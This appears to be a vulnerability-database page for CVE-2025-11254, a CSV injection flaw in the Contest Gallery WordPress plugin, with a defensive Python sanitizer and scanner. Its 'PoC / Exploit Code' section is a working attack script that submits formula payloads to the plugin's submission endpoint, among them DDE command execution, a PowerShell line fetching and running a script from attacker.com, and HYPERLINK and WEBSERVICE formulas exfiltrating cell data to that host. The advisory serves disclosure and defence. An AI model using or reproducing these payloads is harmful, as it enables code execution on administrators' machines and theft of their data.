Security Vulnerability Report
CVE-2025-11254 CVSS 4.3 MEDIUM

CVE-2025-11254

Published: 2025-10-11 09:15:32
Last Modified: 2026-04-15 00:35:42

Description

The Contest Gallery – Upload, Vote & Sell with PayPal and Stripe plugin for WordPress is vulnerable to CSV Injection in all versions up to, and including, 27.0.3 via gallery submissions. This makes it possible for unauthenticated attackers to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.
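A defensive counterpart to the weakness described above, added here as an example and not part of the CVE record or the plugin's own code: it neutralizes formula-triggering cells when writing a CSV export (the single-quote prefix from OWASP's CSV injection guidance) and scans an existing export for cells a spreadsheet would evaluate. The submission rows are constructed.

```python
import csv
import io

# Leading characters that Excel/LibreOffice treat as the start of a formula
# (the set from OWASP's CSV injection guidance): = + - @ plus tab and CR.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

def neutralize_cell(value):
    """Defuse a user-supplied cell for CSV export.

    A leading formula trigger is prefixed with a single quote so the
    spreadsheet treats the cell as text. Caveat: legitimate values starting
    with '-' (negative numbers) are prefixed too, so apply this to free-text
    fields only; some readers also leave the apostrophe visible.
    """
    text = str(value)
    if text.startswith(FORMULA_TRIGGERS):
        text = "'" + text
    return text

def export_rows(rows, header):
    """Write rows as CSV with every cell neutralized and quoted; the csv
    module doubles embedded quotes so a value cannot break out of its field."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()

def find_formula_cells(csv_text):
    """Scan an existing export (e.g. one produced before patching) and return
    (row, column) positions of cells a spreadsheet would evaluate as formulas."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_TRIGGERS):
                hits.append((r, c))
    return hits

# Constructed gallery submissions (name, description), not real plugin data.
SAMPLE_SUBMISSIONS = [
    ("Alice", "Sunset over the bay"),
    ('=HYPERLINK("http://example.invalid/?"&A1, "Click")', "looks innocent"),
    ("+1 great shot", "-"),
]
```

Calling `export_rows(SAMPLE_SUBMISSIONS, ["name", "description"])` yields an export in which `find_formula_cells` reports no evaluable cells.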

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Contest Gallery <= 27.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11254 - Contest Gallery CSV Injection PoC
# Attackers inject malicious formulas via gallery submission fields
# (e.g., contestant name, description, comment fields)
import requests

TARGET_URL = "https://target-wordpress-site.com"
# The Contest Gallery plugin typically exposes a submission endpoint
# The exact endpoint varies based on gallery configuration
SUBMIT_ENDPOINT = f"{TARGET_URL}/wp-admin/admin-ajax.php"

# Malicious CSV injection payloads
# These will be embedded into exported CSV files and executed when opened in Excel/LibreOffice
PAYLOADS = [
    # Windows command execution via DDE in Excel
    '=cmd|\"/c calc.exe\"!A1',
    # PowerShell reverse shell (example)
    '=cmd|\"/c powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(\"http://attacker.com/shell.ps1\")\"!A1',
    # Data exfiltration via HYPERLINK
    '=HYPERLINK("http://attacker.com/exfil?data="&A1, "Click for results")',
    # Data exfiltration via WEBSERVICE (LibreOffice)
    '=WEBSERVICE("http://attacker.com/exfil?"&A1)',
    # Alternative formula triggers
    '+cmd|\"/c calc\"!A1',
    '@SUM(1+1)*cmd|\"/c calc\"!A1',
]


def inject_csv_payload(gallery_id, field_name, payload):
    """
    Submit a malicious payload through the Contest Gallery submission form.
    The payload will be stored in the database and later exported to CSV.
    """
    data = {
        "action": "cg_submit_gallery",  # Plugin-specific action
        "cg_gallery_id": gallery_id,
        "cg_upload": "1",
        field_name: payload,  # Inject into a text field like name/description
    }
    response = requests.post(SUBMIT_ENDPOINT, data=data)
    return response


# Example usage: inject payload into contestant name field
# gallery_id should be replaced with a valid gallery ID from the target site
for payload in PAYLOADS:
    result = inject_csv_payload(gallery_id="1", field_name="cg_name", payload=payload)
    print(f"Payload submitted: {payload[:50]}... | Status: {result.status_code}")

# After submission, when an admin exports gallery data as CSV,
# the malicious formulas will be embedded in the exported file.
# Opening the CSV in Excel/LibreOffice triggers code execution.
```

References

Plugin changeset for cg-backend-gallery-general.php (27.0.3 to 28.0.0):
https://plugins.trac.wordpress.org/changeset/3375891/contest-gallery/tags/28.0.0/functions/backend/render/cg-backend-gallery-general.php?old=3372123&old_path=contest-gallery%2Ftags%2F27.0.3%2Ffunctions%2Fbackend%2Frender%2Fcg-backend-gallery-general.php

Full changeset between tags 27.0.3 and 28.0.0:
https://plugins.trac.wordpress.org/changeset?old_path=/contest-gallery/tags/27.0.3&new_path=/contest-gallery/tags/28.0.0&sfp_email=&sfph_mail=

Wordfence advisory:
https://www.wordfence.com/threat-intel/vulnerabilities/id/9a0dc62c-786d-40f3-b9c9-bd199a176192?source=cve

Weakness
CWE-1236
Exploitability Score
2.8
Impact Score
1.4
Record Status
Deferred